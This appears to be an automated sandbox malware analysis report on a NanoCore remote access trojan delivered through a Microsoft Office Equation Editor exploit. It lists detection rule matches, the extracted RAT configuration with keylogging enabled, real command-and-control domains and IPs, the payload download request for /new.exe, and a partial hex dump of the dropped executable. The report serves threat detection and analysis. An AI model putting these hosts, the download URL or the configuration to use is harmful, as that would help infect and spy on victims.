5.2.vbc.exe.33c9f42.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
5.2.vbc.exe.33d6174.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1c25c:$x1: NanoCore.ClientPluginHost 0x2222d:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x6231b:$x1: NanoCore.ClientPluginHost 0x8a57d:$x1: NanoCore.ClientPluginHost 0x999bd:$x1: NanoCore.ClientPluginHost 0xb1859:$x1: NanoCore.ClientPluginHost 0xd9aa7:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x1c295:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x62348:$x2: IClientNetworkHost
5.2.vbc.exe.33d6174.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.33d6174.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1c25c:$a: NanoCore 0x1c2d6:$a: NanoCore 0x20e73:$a: NanoCore 0x2222d:$a: NanoCore 0x22277:$a: NanoCore 0x22ed1:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
5.1.vbc.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.1.vbc.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.1.vbc.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
5.2.vbc.exe.400000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.vbc.exe.400000.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
Click to see the 208 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\Public\vbc.exe, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.127.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2620, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2620, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\Public\vbc.exe, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2620, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2808

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\Public\vbc.exe, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\Public\vbc.exe, ProcessId: 2364, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://198.12.127.155/new.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for domain / URL

Show sources

Source: wekeepworking.sytes.net

Virustotal: Detection: 7%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	ReversingLabs: Detection: 34%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 34%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2357227032.00000000044C2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2194726397.0000000001C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.2192160089.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357038377.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2206463442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2360021301.0000000005620000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2155256046.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207202360.0000000003171000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2157666765.0000000001DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2208042866.0000000004432000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207350789.00000000031FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2355089407.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356006744.0000000002201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207760336.0000000004310000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2357138327.0000000004430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2207916460.00000000043A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2356794986.00000000033AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2248, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2808, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2364, type: MEMORY
Source: Yara match	File source: Process Memory Space: opjlpsercy.exe PID: 2236, type: MEMORY
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5624629.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c91458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.4430000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.opjlpsercy.exe.1c80000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3346174.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.43a0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c5116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3335116.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33c9f42.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.44c0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.opjlpsercy.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1da0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.5620000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.1db1458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3339f42.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.4430000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.opjlpsercy.exe.3173258.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.33d6174.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Joe Sandbox ML: detected

Source: 4.2.vbc.exe.40ff3e.1.unpack	Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 7.1.opjlpsercy.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 6.2.opjlpsercy.exe.40ff3e.1.unpack	Avira: Label: ADWARE/Patched.Ren.Gen7
Source: 5.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.2.vbc.exe.44c0000.10.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.vbc.exe.9890000.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.vbc.exe.5620000.25.unpack	Avira: Label: TR/NanoCore.fadte
Source: 7.2.opjlpsercy.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 7.2.opjlpsercy.exe.4430000.10.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 5.1.vbc.exe.400000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe

Unpacked PE file: 7.2.opjlpsercy.exe.4430000.10.unpack

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\Public\vbc.exe	Unpacked PE file: 5.2.vbc.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Unpacked PE file: 7.2.opjlpsercy.exe.400000.0.unpack

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: Uindows\System.pdbpdbtem.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: System.pdb H~t source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdbT source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.2153150700.0000000009C90000.00000004.00000001.sdmp, opjlpsercy.exe, 00000006.00000003.2190074429.0000000002850000.00000004.00000001.sdmp
Source:	Binary string: >Usymbols\dll\System.pdb8 source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: vbc.exe, 00000005.00000002.2359891154.00000000055B0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: vbc.exe, 00000005.00000002.2359928883.00000000055D0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: UT32pC:\Windows\System.pdb4 source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: .pdbf source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: vbc.exe, 00000005.00000002.2359835879.0000000005450000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: vbc.exe, 00000005.00000002.2359904698.00000000055C0000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: vbc.exe, 00000005.00000002.2359847913.0000000005460000.00000004.00000001.sdmp, opjlpsercy.exe, 00000007.00000002.2207095611.000000000217E000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000005.00000002.2358191649.0000000004910000.00000002.00000001.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.]x source: vbc.exe, 00000005.00000002.2359809094.000000000530C000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: vbc.exe, 00000005.00000002.2355211092.0000000000557000.00000004.00000040.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404A29 FindFirstFileExW,
Source: C:\Users\Public\vbc.exe	Code function: 5_1_00404A29 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_2_00404A29 FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe	Code function: 7_1_00404A29 FindFirstFileExW,

Source: excel.exe

Memory has grown: Private usage: 4MB later: 63MB

Source: C:\Users\Public\vbc.exe

Code function: 4x nop then mov esp, ebp

Source: global traffic

DNS query: name: wekeepworking.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.127.155:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.127.155:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: wekeepworking.sytes.net
Source: Malware configuration extractor	URLs: wekeepworking12.sytes.net

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 79.134.225.90:1144

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 13:02:33 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Thu, 10 Jun 2021 09:45:52 GMTETag: "a6abc-5c46641bd1c9b"Accept-Ranges: bytesContent-Length: 682684Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

IP Address: 79.134.225.90 79.134.225.90

Source: Joe Sandbox View	ASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.155Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.127.155
